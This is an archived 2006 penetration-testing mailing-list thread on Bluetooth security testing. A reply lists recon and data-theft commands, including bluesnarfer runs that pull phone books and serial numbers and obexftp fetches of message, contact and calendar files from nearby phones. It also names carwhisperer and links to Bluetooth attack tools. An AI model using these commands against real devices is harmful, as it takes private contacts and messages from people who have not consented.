Penetration Testing mailing list archives
SV: Bluetooth Pentesting?
From: "Martin Gustafsson" <gustafsson.martin () bredband net>
Date: Tue, 22 Aug 2006 22:27:41 +0200
Hi, The car stereo trick can be done using carwhisperer (see Trifinites page). I have not been monitoring bluetooth security for the last year, but here are some commands you can run. Do not expect to find any major holes on a new phone though... COMMANDS: hcitool info $BD_ADDR hcitool name $BD_ADDR sdptool browse $BD_ADDR sdptool browse --tree $BD_ADDR Snarf name and serial bluesnarfer -i -b $BD_ADDR Snarf phone books bluesnarfer -l -b $BD_ADDR Try to FTP files obexftp -b $BD_ADDR -B $channel -g $file The FTP channel is labeld "OBEX Object Push" when you run "sdptool browse" Files I have found to be valid on different phones telecom/cal.vcs telecom/cal/###.vcs telecom/cal/info.log telecom/devinfo.txt telecom/folderlisting telecom/inmsg.vmg telecom/note.vnt telecom/outmsg.vmg telecom/pb.vcf telecom/pb/###.vcf telecom/pb/0.vcf telecom/pb/1.vcf telecom/pb/info.log telecom/push.txt telecom/rtc.txt telecom/sentmsg.vm telecom/something.jph Scan RFCOMM channels rfcomm_scan $BD_ADDR Scan 30 000 PSM ports (takes LONG time) psm_scan $BD_ADDR SOME LINKS: Bluesweep: http://www.airmagnet.com/products/bluesweep.htm BLUETOOTH SECURITY TOOLS http://student.vub.ac.be/~sijansse/2e%20lic/BT/Tools/Tools.html Bluescanner http://www.networkchemistry.com/products/bluescanner.php Bluetooth projects http://www.alighieri.org/project.html Bluesniping http://www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt1/ Bluetooth device security database http://www.betaversion.net/btdsd/ BTscanner http://www.pentest.co.uk/cgi-bin/viewcat.cgi?cat=downloads Bluetooth advisories and "Greenplaque" http://www.digitalmunition.com/ Backtrack (Bootable pentest dist) got a bunch of bluetooth tools. http://www.remote-exploit.org/index.php/BackTrack Bluetooth tools http://www.securitywireless.info/Downloads-index-req-viewdownload-cid-18.htm l Bluetest.pl http://www.syss.de/links.html Trifinite tools http://trifinite.org/trifinite_downloads.html Regards, Martin Gustafsson CISSP -----Ursprungligt meddelande----- Från: Robert D. Holtz [mailto:robert.d.holtz () gmail com] Skickat: den 22 augusti 2006 02:49 Till: steven () lovebug org; pen-test () securityfocus com Ämne: RE: Bluetooth Pentesting? Here's an interesting article on Blue tooth security: http://ntrg.cs.tcd.ie/undergrad/4ba2.05/group15/index.html There was also a story circulating awhile back about the ability to transmit radio directly into someone's car stereo with a directional antenna. I'm sorry that I can't recall the details but I found it amusing that you can mess with someone by having whatever you want coming out their radio ... not truly a "real" security issue but amusing none the less. -----Original Message----- From: steven () lovebug org [mailto:steven () lovebug org] Sent: Monday, August 21, 2006 3:06 PM To: pen-test () securityfocus com Subject: Bluetooth Pentesting? Greetings, Does anyone on this list do bluetooth pentesting? I have read tons of old posts and found plenty of tools to do a few different things. However, I do not find any of it to be overly useful. Most of the tools out there seem to be aimed at certain cell phones or are very specific. I am trying to find out what the risks are of all kinds of devices. I have found btscanner to be pretty good at detecting devices but it doesn't do too much other than detect it. I can scan and pickup 150+ devices and the Vulnerable to: section is always the same.. blank. Are all the bluetooth devices I find so super secure? I pick up cars, phones, PDAs, computers, keyboards, etc. Are there really no risks with these devices? Is there a better/good tool out there that can really find various bluetooth devices and tell me what -real- risks might be associated with them -- on top of that.. is there a good tool for trying to pull data or use these devices? Example: a dell or mac laptop has bluetooth on, or a Treo with it on.. what are the possible risks? What tools can actually test if authentication is required for connecting with these devices.. or whether I can bruteforce it or connect at all? Any suggestions would be greatly appreciate and I am really trying to do something more than just "detect" bluetooth devices. I need to know if there are risks here. Thanks ------------------------------------------------------------------------ This List Sponsored by: Cenzic Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast. Click the link to buy it, try it or download Hailstorm for FREE. http://www.cenzic.com/products_services/download_hailstorm.php ------------------------------------------------------------------------ ------------------------------------------------------------------------ This List Sponsored by: Cenzic Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast. Click the link to buy it, try it or download Hailstorm for FREE. http://www.cenzic.com/products_services/download_hailstorm.php ------------------------------------------------------------------------ ------------------------------------------------------------------------ This List Sponsored by: Cenzic Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast. Click the link to buy it, try it or download Hailstorm for FREE. http://www.cenzic.com/products_services/download_hailstorm.php ------------------------------------------------------------------------
Current thread:
- Penetration Testing - Human Factor Marios A. Spinthiras (Aug 21)
- Bluetooth Pentesting? steven (Aug 21)
- RE: Bluetooth Pentesting? Robert D. Holtz (Aug 21)
- Re: Bluetooth Pentesting? Fabio Nigi (Aug 22)
- Re: Bluetooth Pentesting? Thor (Hammer of God) (Aug 22)
- SV: Bluetooth Pentesting? Martin Gustafsson (Aug 22)
- Re[2]: Bluetooth Pentesting? Thierry Zoller (Aug 22)
- Re: Bluetooth Pentesting? Times Enemy (Aug 22)
- RE: Bluetooth Pentesting? Robert D. Holtz (Aug 21)
- RE: Penetration Testing - Human Factor Paul Melson (Aug 21)
- RE: Penetration Testing - Human Factor Arian J. Evans (Aug 21)
- Re: Penetration Testing - Human Factor Marios A. Spinthiras (Aug 23)
- RE: Penetration Testing - Human Factor Isaac Van Name (Aug 24)
- RE: Penetration Testing - Human Factor StyleWar (Aug 26)
- Re: Penetration Testing - Human Factor Marios A. Spinthiras (Aug 23)
- Re: Penetration Testing - Human Factor R. DuFresne (Aug 22)
- RE: Penetration Testing - Human Factor StyleWar (Aug 26)
- <Possible follow-ups>
- Re: Penetration Testing - Human Factor Catsworth (Aug 22)
(Thread continues...)
- Bluetooth Pentesting? steven (Aug 21)